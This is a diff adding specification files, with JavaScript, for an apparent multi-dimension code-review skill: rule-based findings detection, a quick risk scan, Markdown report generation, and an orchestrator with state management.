||||
### Readability (可读性)
|
||||
- 命名规范
|
||||
- 函数长度和复杂度
|
||||
- 代码重复
|
||||
- 注释质量
|
||||
- 代码组织
|
||||
|
||||
### Performance (性能)
|
||||
- 算法复杂度
|
||||
- 不必要的计算
|
||||
- 内存使用
|
||||
- I/O 效率
|
||||
- 缓存策略
|
||||
|
||||
### Security (安全性)
|
||||
- 注入风险 (SQL, XSS, Command)
|
||||
- 认证和授权
|
||||
- 敏感数据处理
|
||||
- 加密使用
|
||||
- 依赖安全
|
||||
|
||||
### Testing (测试)
|
||||
- 测试覆盖率
|
||||
- 边界条件测试
|
||||
- 错误路径测试
|
||||
- 测试可维护性
|
||||
- Mock 使用
|
||||
|
||||
### Architecture (架构)
|
||||
- 分层结构
|
||||
- 依赖方向
|
||||
- 单一职责
|
||||
- 接口设计
|
||||
- 扩展性
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir, currentDimension) {
|
||||
const context = state.context;
|
||||
const dimension = currentDimension;
|
||||
const findings = [];
|
||||
|
||||
// 从外部 JSON 文件加载规则
|
||||
const rulesConfig = loadRulesConfig(dimension, workDir);
|
||||
const rules = rulesConfig.rules || [];
|
||||
const prefix = rulesConfig.prefix || getDimensionPrefix(dimension);
|
||||
|
||||
// 优先审查高风险区域
|
||||
const filesToReview = state.scan_summary?.risk_areas
|
||||
?.map(r => r.file)
|
||||
?.filter(f => context.files.includes(f)) || context.files;
|
||||
|
||||
const filesToCheck = [...new Set([
|
||||
...filesToReview.slice(0, 20),
|
||||
...context.files.slice(0, 30)
|
||||
])].slice(0, 50); // 最多50个文件
|
||||
|
||||
let findingCounter = 1;
|
||||
|
||||
for (const file of filesToCheck) {
|
||||
try {
|
||||
const content = Read(file);
|
||||
const lines = content.split('\n');
|
||||
|
||||
// 应用外部规则文件中的规则
|
||||
for (const rule of rules) {
|
||||
const matches = detectByPattern(content, lines, file, rule);
|
||||
for (const match of matches) {
|
||||
findings.push({
|
||||
id: `${prefix}-${String(findingCounter++).padStart(3, '0')}`,
|
||||
severity: rule.severity || match.severity,
|
||||
dimension: dimension,
|
||||
category: rule.category,
|
||||
file: file,
|
||||
line: match.line,
|
||||
code_snippet: match.snippet,
|
||||
description: rule.description,
|
||||
recommendation: rule.recommendation,
|
||||
fix_example: rule.fixExample
|
||||
});
|
||||
}
|
||||
}
|
||||
} catch (e) {
|
||||
// 跳过无法读取的文件
|
||||
}
|
||||
}
|
||||
|
||||
// 保存维度发现
|
||||
Write(`${workDir}/findings/${dimension}.json`, JSON.stringify(findings, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
reviewed_dimensions: [...(state.reviewed_dimensions || []), dimension],
|
||||
current_dimension: null,
|
||||
[`findings.${dimension}`]: findings
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* 从外部 JSON 文件加载规则配置
|
||||
* 规则文件位于 specs/rules/{dimension}-rules.json
|
||||
* @param {string} dimension - 维度名称 (correctness, security, etc.)
|
||||
* @param {string} workDir - 工作目录 (用于日志记录)
|
||||
* @returns {object} 规则配置对象,包含 rules 数组和 prefix
|
||||
*/
|
||||
function loadRulesConfig(dimension, workDir) {
|
||||
// 规则文件路径:相对于 skill 目录
|
||||
const rulesPath = `specs/rules/${dimension}-rules.json`;
|
||||
|
||||
try {
|
||||
const rulesFile = Read(rulesPath);
|
||||
const rulesConfig = JSON.parse(rulesFile);
|
||||
return rulesConfig;
|
||||
} catch (e) {
|
||||
console.warn(`Failed to load rules for ${dimension}: ${e.message}`);
|
||||
// 返回空规则配置,保持向后兼容
|
||||
return { rules: [], prefix: getDimensionPrefix(dimension) };
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* 根据规则的 patternType 检测代码问题
|
||||
* 支持的 patternType: regex, includes
|
||||
* @param {string} content - 文件内容
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} file - 文件路径
|
||||
* @param {object} rule - 规则配置对象
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByPattern(content, lines, file, rule) {
|
||||
const matches = [];
|
||||
const { pattern, patternType, negativePatterns, caseInsensitive } = rule;
|
||||
|
||||
if (!pattern) return matches;
|
||||
|
||||
switch (patternType) {
|
||||
case 'regex':
|
||||
return detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive);
|
||||
|
||||
case 'includes':
|
||||
return detectByIncludes(content, lines, pattern, negativePatterns);
|
||||
|
||||
default:
|
||||
// 默认使用 includes 模式
|
||||
return detectByIncludes(content, lines, pattern, negativePatterns);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* 使用正则表达式检测代码问题
|
||||
* @param {string} content - 文件完整内容
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} pattern - 正则表达式模式
|
||||
* @param {string[]} negativePatterns - 排除模式列表
|
||||
* @param {boolean} caseInsensitive - 是否忽略大小写
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive) {
|
||||
const matches = [];
|
||||
const flags = caseInsensitive ? 'gi' : 'g';
|
||||
|
||||
try {
|
||||
const regex = new RegExp(pattern, flags);
|
||||
let match;
|
||||
|
||||
while ((match = regex.exec(content)) !== null) {
|
||||
const lineNum = content.substring(0, match.index).split('\n').length;
|
||||
const lineContent = lines[lineNum - 1] || '';
|
||||
|
||||
// 检查排除模式 - 如果行内容匹配任一排除模式则跳过
|
||||
if (negativePatterns && negativePatterns.length > 0) {
|
||||
const shouldExclude = negativePatterns.some(np => {
|
||||
try {
|
||||
return new RegExp(np).test(lineContent);
|
||||
} catch {
|
||||
return lineContent.includes(np);
|
||||
}
|
||||
});
|
||||
if (shouldExclude) continue;
|
||||
}
|
||||
|
||||
matches.push({
|
||||
line: lineNum,
|
||||
snippet: lineContent.trim().substring(0, 100),
|
||||
matchedText: match[0]
|
||||
});
|
||||
}
|
||||
} catch (e) {
|
||||
console.warn(`Invalid regex pattern: ${pattern}`);
|
||||
}
|
||||
|
||||
return matches;
|
||||
}
|
||||
|
||||
/**
|
||||
* 使用字符串包含检测代码问题
|
||||
* @param {string} content - 文件完整内容 (未使用但保持接口一致)
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} pattern - 要查找的字符串
|
||||
* @param {string[]} negativePatterns - 排除模式列表
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
function detectByIncludes(content, lines, pattern, negativePatterns) {
|
||||
const matches = [];
|
||||
|
||||
lines.forEach((line, i) => {
|
||||
if (line.includes(pattern)) {
|
||||
// 检查排除模式 - 如果行内容包含任一排除字符串则跳过
|
||||
if (negativePatterns && negativePatterns.length > 0) {
|
||||
const shouldExclude = negativePatterns.some(np => line.includes(np));
|
||||
if (shouldExclude) return;
|
||||
}
|
||||
|
||||
matches.push({
|
||||
line: i + 1,
|
||||
snippet: line.trim().substring(0, 100),
|
||||
matchedText: pattern
|
||||
});
|
||||
}
|
||||
});
|
||||
|
||||
return matches;
|
||||
}
|
||||
|
||||
/**
|
||||
* 获取维度前缀(作为规则文件不存在时的备用)
|
||||
* @param {string} dimension - 维度名称
|
||||
* @returns {string} 4字符前缀
|
||||
*/
|
||||
function getDimensionPrefix(dimension) {
|
||||
const prefixes = {
|
||||
correctness: 'CORR',
|
||||
readability: 'READ',
|
||||
performance: 'PERF',
|
||||
security: 'SEC',
|
||||
testing: 'TEST',
|
||||
architecture: 'ARCH'
|
||||
};
|
||||
return prefixes[dimension] || 'MISC';
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
reviewed_dimensions: [...state.reviewed_dimensions, currentDimension],
|
||||
current_dimension: null,
|
||||
findings: {
|
||||
...state.findings,
|
||||
[currentDimension]: newFindings
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `findings/{dimension}.json`
|
||||
- **Location**: `${workDir}/findings/`
|
||||
- **Format**: JSON array of Finding objects
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 文件读取失败 | 跳过该文件,记录警告 |
|
||||
| 规则执行错误 | 跳过该规则,继续其他规则 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 还有未审查维度: 继续 action-deep-review
|
||||
- 所有维度完成: action-generate-report
|
||||
@@ -0,0 +1,263 @@
|
||||
# Action: Generate Report
|
||||
|
||||
汇总所有发现,生成结构化审查报告。
|
||||
|
||||
## Purpose
|
||||
|
||||
生成最终的代码审查报告:
|
||||
- 汇总所有维度的发现
|
||||
- 按严重程度排序
|
||||
- 提供统计摘要
|
||||
- 输出 Markdown 格式报告
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] 所有维度已审查完成 (reviewed_dimensions.length === 6)
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
const context = state.context;
|
||||
const findings = state.findings;
|
||||
|
||||
// 1. 汇总所有发现
|
||||
const allFindings = [
|
||||
...findings.correctness,
|
||||
...findings.readability,
|
||||
...findings.performance,
|
||||
...findings.security,
|
||||
...findings.testing,
|
||||
...findings.architecture
|
||||
];
|
||||
|
||||
// 2. 按严重程度排序
|
||||
const severityOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
|
||||
allFindings.sort((a, b) => severityOrder[a.severity] - severityOrder[b.severity]);
|
||||
|
||||
// 3. 统计
|
||||
const stats = {
|
||||
total_issues: allFindings.length,
|
||||
critical: allFindings.filter(f => f.severity === 'critical').length,
|
||||
high: allFindings.filter(f => f.severity === 'high').length,
|
||||
medium: allFindings.filter(f => f.severity === 'medium').length,
|
||||
low: allFindings.filter(f => f.severity === 'low').length,
|
||||
info: allFindings.filter(f => f.severity === 'info').length,
|
||||
by_dimension: {
|
||||
correctness: findings.correctness.length,
|
||||
readability: findings.readability.length,
|
||||
performance: findings.performance.length,
|
||||
security: findings.security.length,
|
||||
testing: findings.testing.length,
|
||||
architecture: findings.architecture.length
|
||||
}
|
||||
};
|
||||
|
||||
// 4. 生成报告
|
||||
const report = generateMarkdownReport(context, stats, allFindings, state.scan_summary);
|
||||
|
||||
// 5. 保存报告
|
||||
const reportPath = `${workDir}/review-report.md`;
|
||||
Write(reportPath, report);
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
report_generated: true,
|
||||
report_path: reportPath,
|
||||
summary: {
|
||||
...stats,
|
||||
review_duration_ms: Date.now() - new Date(state.started_at).getTime()
|
||||
}
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
function generateMarkdownReport(context, stats, findings, scanSummary) {
|
||||
const severityEmoji = {
|
||||
critical: '🔴',
|
||||
high: '🟠',
|
||||
medium: '🟡',
|
||||
low: '🔵',
|
||||
info: '⚪'
|
||||
};
|
||||
|
||||
let report = `# Code Review Report
|
||||
|
||||
## 审查概览
|
||||
|
||||
| 项目 | 值 |
|
||||
|------|------|
|
||||
| 目标路径 | \`${context.target_path}\` |
|
||||
| 文件数量 | ${context.file_count} |
|
||||
| 代码行数 | ${context.total_lines} |
|
||||
| 主要语言 | ${context.language} |
|
||||
| 框架 | ${context.framework || 'N/A'} |
|
||||
|
||||
## 问题统计
|
||||
|
||||
| 严重程度 | 数量 |
|
||||
|----------|------|
|
||||
| 🔴 Critical | ${stats.critical} |
|
||||
| 🟠 High | ${stats.high} |
|
||||
| 🟡 Medium | ${stats.medium} |
|
||||
| 🔵 Low | ${stats.low} |
|
||||
| ⚪ Info | ${stats.info} |
|
||||
| **总计** | **${stats.total_issues}** |
|
||||
|
||||
### 按维度统计
|
||||
|
||||
| 维度 | 问题数 |
|
||||
|------|--------|
|
||||
| Correctness (正确性) | ${stats.by_dimension.correctness} |
|
||||
| Security (安全性) | ${stats.by_dimension.security} |
|
||||
| Performance (性能) | ${stats.by_dimension.performance} |
|
||||
| Readability (可读性) | ${stats.by_dimension.readability} |
|
||||
| Testing (测试) | ${stats.by_dimension.testing} |
|
||||
| Architecture (架构) | ${stats.by_dimension.architecture} |
|
||||
|
||||
---
|
||||
|
||||
## 高风险区域
|
||||
|
||||
`;
|
||||
|
||||
if (scanSummary?.risk_areas?.length > 0) {
|
||||
report += `| 文件 | 原因 | 优先级 |
|
||||
|------|------|--------|
|
||||
`;
|
||||
for (const area of scanSummary.risk_areas.slice(0, 10)) {
|
||||
report += `| \`${area.file}\` | ${area.reason} | ${area.priority} |\n`;
|
||||
}
|
||||
} else {
|
||||
report += `未发现明显的高风险区域。\n`;
|
||||
}
|
||||
|
||||
report += `
|
||||
---
|
||||
|
||||
## 问题详情
|
||||
|
||||
`;
|
||||
|
||||
// 按维度分组输出
|
||||
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
|
||||
const dimensionNames = {
|
||||
correctness: '正确性 (Correctness)',
|
||||
security: '安全性 (Security)',
|
||||
performance: '性能 (Performance)',
|
||||
readability: '可读性 (Readability)',
|
||||
testing: '测试 (Testing)',
|
||||
architecture: '架构 (Architecture)'
|
||||
};
|
||||
|
||||
for (const dim of dimensions) {
|
||||
const dimFindings = findings.filter(f => f.dimension === dim);
|
||||
if (dimFindings.length === 0) continue;
|
||||
|
||||
report += `### ${dimensionNames[dim]}
|
||||
|
||||
`;
|
||||
|
||||
for (const finding of dimFindings) {
|
||||
report += `#### ${severityEmoji[finding.severity]} [${finding.id}] ${finding.category}
|
||||
|
||||
- **严重程度**: ${finding.severity.toUpperCase()}
|
||||
- **文件**: \`${finding.file}\`${finding.line ? `:${finding.line}` : ''}
|
||||
- **描述**: ${finding.description}
|
||||
`;
|
||||
|
||||
if (finding.code_snippet) {
|
||||
report += `
|
||||
\`\`\`
|
||||
${finding.code_snippet}
|
||||
\`\`\`
|
||||
`;
|
||||
}
|
||||
|
||||
report += `
|
||||
**建议**: ${finding.recommendation}
|
||||
`;
|
||||
|
||||
if (finding.fix_example) {
|
||||
report += `
|
||||
**修复示例**:
|
||||
\`\`\`
|
||||
${finding.fix_example}
|
||||
\`\`\`
|
||||
`;
|
||||
}
|
||||
|
||||
report += `
|
||||
---
|
||||
|
||||
`;
|
||||
}
|
||||
}
|
||||
|
||||
report += `
|
||||
## 审查建议
|
||||
|
||||
### 必须修复 (Must Fix)
|
||||
|
||||
${stats.critical + stats.high > 0
|
||||
? `发现 ${stats.critical} 个严重问题和 ${stats.high} 个高优先级问题,建议在合并前修复。`
|
||||
: '未发现必须立即修复的问题。'}
|
||||
|
||||
### 建议改进 (Should Fix)
|
||||
|
||||
${stats.medium > 0
|
||||
? `发现 ${stats.medium} 个中等优先级问题,建议在后续迭代中改进。`
|
||||
: '代码质量良好,无明显需要改进的地方。'}
|
||||
|
||||
### 可选优化 (Nice to Have)
|
||||
|
||||
${stats.low + stats.info > 0
|
||||
? `发现 ${stats.low + stats.info} 个低优先级建议,可根据团队规范酌情处理。`
|
||||
: '无额外建议。'}
|
||||
|
||||
---
|
||||
|
||||
*报告生成时间: ${new Date().toISOString()}*
|
||||
`;
|
||||
|
||||
return report;
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
report_generated: true,
|
||||
report_path: reportPath,
|
||||
summary: {
|
||||
total_issues: totalCount,
|
||||
critical: criticalCount,
|
||||
high: highCount,
|
||||
medium: mediumCount,
|
||||
low: lowCount,
|
||||
info: infoCount,
|
||||
review_duration_ms: duration
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `review-report.md`
|
||||
- **Location**: `${workDir}/review-report.md`
|
||||
- **Format**: Markdown
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 写入失败 | 尝试备用位置 |
|
||||
| 模板错误 | 使用简化格式 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-complete
|
||||
164
.claude/skills/review-code/phases/actions/action-quick-scan.md
Normal file
@@ -0,0 +1,164 @@
|
||||
# Action: Quick Scan
|
||||
|
||||
快速扫描代码,识别高风险区域。
|
||||
|
||||
## Purpose
|
||||
|
||||
进行第一遍快速扫描:
|
||||
- 识别复杂度高的文件
|
||||
- 标记潜在的高风险区域
|
||||
- 发现明显的问题模式
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.context !== null
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
const context = state.context;
|
||||
const riskAreas = [];
|
||||
const quickIssues = [];
|
||||
|
||||
// 1. 扫描每个文件
|
||||
for (const file of context.files) {
|
||||
try {
|
||||
const content = Read(file);
|
||||
const lines = content.split('\n');
|
||||
|
||||
// --- 复杂度检查 ---
|
||||
const functionMatches = content.match(/function\s+\w+|=>\s*{|async\s+\w+/g) || [];
|
||||
const nestingDepth = Math.max(...lines.map(l => (l.match(/^\s*/)?.[0].length || 0) / 2));
|
||||
|
||||
if (lines.length > 500 || functionMatches.length > 20 || nestingDepth > 8) {
|
||||
riskAreas.push({
|
||||
file: file,
|
||||
reason: `High complexity: ${lines.length} lines, ${functionMatches.length} functions, depth ${nestingDepth}`,
|
||||
priority: 'high'
|
||||
});
|
||||
}
|
||||
|
||||
// --- 快速问题检测 ---
|
||||
|
||||
// 安全问题快速检测
|
||||
if (content.includes('eval(') || content.includes('innerHTML')) {
|
||||
quickIssues.push({
|
||||
type: 'security',
|
||||
file: file,
|
||||
message: 'Potential XSS/injection risk: eval() or innerHTML usage'
|
||||
});
|
||||
}
|
||||
|
||||
// 硬编码密钥检测
|
||||
if (/(?:password|secret|api_key|token)\s*[=:]\s*['"][^'"]{8,}/i.test(content)) {
|
||||
quickIssues.push({
|
||||
type: 'security',
|
||||
file: file,
|
||||
message: 'Potential hardcoded credential detected'
|
||||
});
|
||||
}
|
||||
|
||||
// TODO/FIXME 检测
|
||||
const todoCount = (content.match(/TODO|FIXME|HACK|XXX/gi) || []).length;
|
||||
if (todoCount > 5) {
|
||||
quickIssues.push({
|
||||
type: 'maintenance',
|
||||
file: file,
|
||||
message: `${todoCount} TODO/FIXME comments found`
|
||||
});
|
||||
}
|
||||
|
||||
// console.log 检测(生产代码)
|
||||
if (!file.includes('test') && !file.includes('spec')) {
|
||||
const consoleCount = (content.match(/console\.(log|debug|info)/g) || []).length;
|
||||
if (consoleCount > 3) {
|
||||
quickIssues.push({
|
||||
type: 'readability',
|
||||
file: file,
|
||||
message: `${consoleCount} console statements (should be removed in production)`
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// 长函数检测
|
||||
const longFunctions = content.match(/function[^{]+\{[^}]{2000,}\}/g) || [];
|
||||
if (longFunctions.length > 0) {
|
||||
quickIssues.push({
|
||||
type: 'readability',
|
||||
file: file,
|
||||
message: `${longFunctions.length} long function(s) detected (>50 lines)`
|
||||
});
|
||||
}
|
||||
|
||||
// 错误处理检测
|
||||
if (content.includes('catch') && content.includes('catch (') && content.match(/catch\s*\([^)]*\)\s*{\s*}/)) {
|
||||
quickIssues.push({
|
||||
type: 'correctness',
|
||||
file: file,
|
||||
message: 'Empty catch block detected'
|
||||
});
|
||||
}
|
||||
|
||||
} catch (e) {
|
||||
// 跳过无法读取的文件
|
||||
}
|
||||
}
|
||||
|
||||
// 2. 计算复杂度评分
|
||||
const complexityScore = Math.min(100, Math.round(
|
||||
(riskAreas.length * 10 + quickIssues.length * 5) / context.file_count * 100
|
||||
));
|
||||
|
||||
// 3. 构建扫描摘要
|
||||
const scanSummary = {
|
||||
risk_areas: riskAreas,
|
||||
complexity_score: complexityScore,
|
||||
quick_issues: quickIssues
|
||||
};
|
||||
|
||||
// 4. 保存扫描结果
|
||||
Write(`${workDir}/scan-summary.json`, JSON.stringify(scanSummary, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
scan_completed: true,
|
||||
scan_summary: scanSummary
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
scan_completed: true,
|
||||
scan_summary: {
|
||||
risk_areas: riskAreas,
|
||||
complexity_score: score,
|
||||
quick_issues: quickIssues
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `scan-summary.json`
|
||||
- **Location**: `${workDir}/scan-summary.json`
|
||||
- **Format**: JSON
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 文件读取失败 | 跳过该文件,继续扫描 |
|
||||
| 编码问题 | 以二进制跳过 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-deep-review (开始逐维度审查)
|
||||
- 风险区域过多 (>20): 可询问用户是否缩小范围
|
||||
251
.claude/skills/review-code/phases/orchestrator.md
Normal file
@@ -0,0 +1,251 @@
|
||||
# Orchestrator
|
||||
|
||||
根据当前状态选择并执行下一个审查动作。
|
||||
|
||||
## Role
|
||||
|
||||
Code Review 编排器,负责:
|
||||
1. 读取当前审查状态
|
||||
2. 根据状态选择下一个动作
|
||||
3. 执行动作并更新状态
|
||||
4. 循环直到审查完成
|
||||
|
||||
## Dependencies
|
||||
|
||||
- **State Manager**: [state-manager.md](./state-manager.md) - 提供原子化状态操作、自动备份、验证和回滚功能
|
||||
|
||||
## State Management
|
||||
|
||||
本模块使用 StateManager 进行所有状态操作,确保:
|
||||
- **原子更新** - 写入临时文件后重命名,防止损坏
|
||||
- **自动备份** - 每次更新前自动创建备份
|
||||
- **回滚能力** - 失败时可从备份恢复
|
||||
- **结构验证** - 确保状态结构完整性
|
||||
|
||||
### StateManager API (from state-manager.md)
|
||||
|
||||
```javascript
|
||||
// 初始化状态
|
||||
StateManager.initState(workDir)
|
||||
|
||||
// 读取当前状态
|
||||
StateManager.getState(workDir)
|
||||
|
||||
// 更新状态(原子操作,自动备份)
|
||||
StateManager.updateState(workDir, updates)
|
||||
|
||||
// 获取下一个待审查维度
|
||||
StateManager.getNextDimension(state)
|
||||
|
||||
// 标记维度完成
|
||||
StateManager.markDimensionComplete(workDir, dimension)
|
||||
|
||||
// 记录错误
|
||||
StateManager.recordError(workDir, action, message)
|
||||
|
||||
// 从备份恢复
|
||||
StateManager.restoreState(workDir)
|
||||
```
|
||||
|
||||
## Decision Logic
|
||||
|
||||
```javascript
|
||||
function selectNextAction(state) {
|
||||
// 1. 终止条件检查
|
||||
if (state.status === 'completed') return null;
|
||||
if (state.status === 'user_exit') return null;
|
||||
if (state.error_count >= 3) return 'action-abort';
|
||||
|
||||
// 2. 初始化阶段
|
||||
if (state.status === 'pending' || !state.context) {
|
||||
return 'action-collect-context';
|
||||
}
|
||||
|
||||
// 3. 快速扫描阶段
|
||||
if (!state.scan_completed) {
|
||||
return 'action-quick-scan';
|
||||
}
|
||||
|
||||
// 4. 深入审查阶段 - 使用 StateManager 获取下一个维度
|
||||
const nextDimension = StateManager.getNextDimension(state);
|
||||
if (nextDimension) {
|
||||
return 'action-deep-review'; // 传递 dimension 参数
|
||||
}
|
||||
|
||||
// 5. 报告生成阶段
|
||||
if (!state.report_generated) {
|
||||
return 'action-generate-report';
|
||||
}
|
||||
|
||||
// 6. 完成
|
||||
return 'action-complete';
|
||||
}
|
||||
```
|
||||
|
||||
## Execution Loop
|
||||
|
||||
```javascript
|
||||
async function runOrchestrator() {
|
||||
console.log('=== Code Review Orchestrator Started ===');
|
||||
|
||||
let iteration = 0;
|
||||
const MAX_ITERATIONS = 20; // 6 dimensions + overhead
|
||||
|
||||
// 初始化状态(如果尚未初始化)
|
||||
let state = StateManager.getState(workDir);
|
||||
if (!state) {
|
||||
state = StateManager.initState(workDir);
|
||||
}
|
||||
|
||||
while (iteration < MAX_ITERATIONS) {
|
||||
iteration++;
|
||||
|
||||
// 1. 读取当前状态(使用 StateManager)
|
||||
state = StateManager.getState(workDir);
|
||||
if (!state) {
|
||||
console.error('[Orchestrator] Failed to read state, attempting recovery...');
|
||||
state = StateManager.restoreState(workDir);
|
||||
if (!state) {
|
||||
console.error('[Orchestrator] Recovery failed, aborting.');
|
||||
break;
|
||||
}
|
||||
}
|
||||
console.log(`[Iteration ${iteration}] Status: ${state.status}`);
|
||||
|
||||
// 2. 选择下一个动作
|
||||
const actionId = selectNextAction(state);
|
||||
|
||||
if (!actionId) {
|
||||
console.log('Review completed, terminating.');
|
||||
break;
|
||||
}
|
||||
|
||||
console.log(`[Iteration ${iteration}] Executing: ${actionId}`);
|
||||
|
||||
// 3. 更新状态:当前动作(使用 StateManager)
|
||||
StateManager.updateState(workDir, { current_action: actionId });
|
||||
|
||||
// 4. 执行动作
|
||||
try {
|
||||
const actionPrompt = Read(`phases/actions/${actionId}.md`);
|
||||
|
||||
// 确定当前需要审查的维度(使用 StateManager)
|
||||
const currentDimension = StateManager.getNextDimension(state);
|
||||
|
||||
const result = await Task({
|
||||
subagent_type: 'universal-executor',
|
||||
run_in_background: false,
|
||||
prompt: `
|
||||
[WORK_DIR]
|
||||
${workDir}
|
||||
|
||||
[STATE]
|
||||
${JSON.stringify(state, null, 2)}
|
||||
|
||||
[CURRENT_DIMENSION]
|
||||
${currentDimension || 'N/A'}
|
||||
|
||||
[ACTION]
|
||||
${actionPrompt}
|
||||
|
||||
[SPECS]
|
||||
Review Dimensions: specs/review-dimensions.md
|
||||
Issue Classification: specs/issue-classification.md
|
||||
|
||||
[RETURN]
|
||||
Return JSON with stateUpdates field containing updates to apply to state.
|
||||
`
|
||||
});
|
||||
|
||||
const actionResult = JSON.parse(result);
|
||||
|
||||
// 5. 更新状态:动作完成(使用 StateManager)
|
||||
StateManager.updateState(workDir, {
|
||||
current_action: null,
|
||||
completed_actions: [...(state.completed_actions || []), actionId],
|
||||
...actionResult.stateUpdates
|
||||
});
|
||||
|
||||
// 如果是深入审查动作,标记维度完成
|
||||
if (actionId === 'action-deep-review' && currentDimension) {
|
||||
StateManager.markDimensionComplete(workDir, currentDimension);
|
||||
}
|
||||
|
||||
} catch (error) {
|
||||
// 错误处理(使用 StateManager.recordError)
|
||||
console.error(`[Orchestrator] Action failed: ${error.message}`);
|
||||
StateManager.recordError(workDir, actionId, error.message);
|
||||
|
||||
// 清除当前动作
|
||||
StateManager.updateState(workDir, { current_action: null });
|
||||
|
||||
// 检查是否需要恢复状态
|
||||
const updatedState = StateManager.getState(workDir);
|
||||
if (updatedState && updatedState.error_count >= 3) {
|
||||
console.error('[Orchestrator] Too many errors, attempting state recovery...');
|
||||
StateManager.restoreState(workDir);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
console.log('=== Code Review Orchestrator Finished ===');
|
||||
}
|
||||
```
|
||||
|
||||
## Action Catalog
|
||||
|
||||
| Action | Purpose | Preconditions |
|
||||
|--------|---------|---------------|
|
||||
| [action-collect-context](actions/action-collect-context.md) | 收集审查目标上下文 | status === 'pending' |
|
||||
| [action-quick-scan](actions/action-quick-scan.md) | 快速扫描识别风险区域 | context !== null |
|
||||
| [action-deep-review](actions/action-deep-review.md) | 深入审查指定维度 | scan_completed === true |
|
||||
| [action-generate-report](actions/action-generate-report.md) | 生成结构化审查报告 | all dimensions reviewed |
|
||||
| [action-complete](actions/action-complete.md) | 完成审查,保存结果 | report_generated === true |
|
||||
|
||||
## Termination Conditions
|
||||
|
||||
- `state.status === 'completed'` - 审查正常完成
|
||||
- `state.status === 'user_exit'` - 用户主动退出
|
||||
- `state.error_count >= 3` - 错误次数超限(由 StateManager.recordError 自动处理)
|
||||
- `iteration >= MAX_ITERATIONS` - 迭代次数超限
|
||||
|
||||
## Error Recovery
|
||||
|
||||
本模块利用 StateManager 提供的错误恢复机制:
|
||||
|
||||
| Error Type | Recovery Strategy | StateManager Function |
|
||||
|------------|-------------------|----------------------|
|
||||
| 状态读取失败 | 从备份恢复 | `restoreState(workDir)` |
|
||||
| 动作执行失败 | 记录错误,累计超限后自动失败 | `recordError(workDir, action, message)` |
|
||||
| 状态不一致 | 验证并恢复 | `getState()` 内置验证 |
|
||||
| 用户中止 | 保存当前进度 | `updateState(workDir, { status: 'user_exit' })` |
|
||||
|
||||
### 错误处理流程
|
||||
|
||||
```
|
||||
1. 动作执行失败
|
||||
|
|
||||
2. StateManager.recordError() 记录错误
|
||||
|
|
||||
3. 检查 error_count
|
||||
|
|
||||
+-- < 3: 继续下一次迭代
|
||||
+-- >= 3: StateManager 自动设置 status='failed'
|
||||
|
|
||||
Orchestrator 检测到 status 变化
|
||||
|
|
||||
尝试 restoreState() 恢复到上一个稳定状态
|
||||
```
|
||||
|
||||
### 状态备份时机
|
||||
|
||||
StateManager 在以下时机自动创建备份:
|
||||
- 每次 `updateState()` 调用前
|
||||
- 可通过 `backupState(workDir, suffix)` 手动创建命名备份
|
||||
|
||||
### 历史追踪
|
||||
|
||||
所有状态变更记录在 `state-history.json`,便于调试和审计:
|
||||
- 初始化事件
|
||||
- 每次更新的字段变更
|
||||
- 恢复操作记录
|
||||
752
.claude/skills/review-code/phases/state-manager.md
Normal file
@@ -0,0 +1,752 @@
|
||||
# State Manager
|
||||
|
||||
Centralized state management module for Code Review workflow. Provides atomic operations, automatic backups, validation, and rollback capabilities.
|
||||
|
||||
## Overview
|
||||
|
||||
This module solves the fragile state management problem by providing:
|
||||
- **Atomic updates** - Write to temp file, then rename (prevents corruption)
|
||||
- **Automatic backups** - Every update creates a backup first
|
||||
- **Rollback capability** - Restore from backup on failure
|
||||
- **Schema validation** - Ensure state structure integrity
|
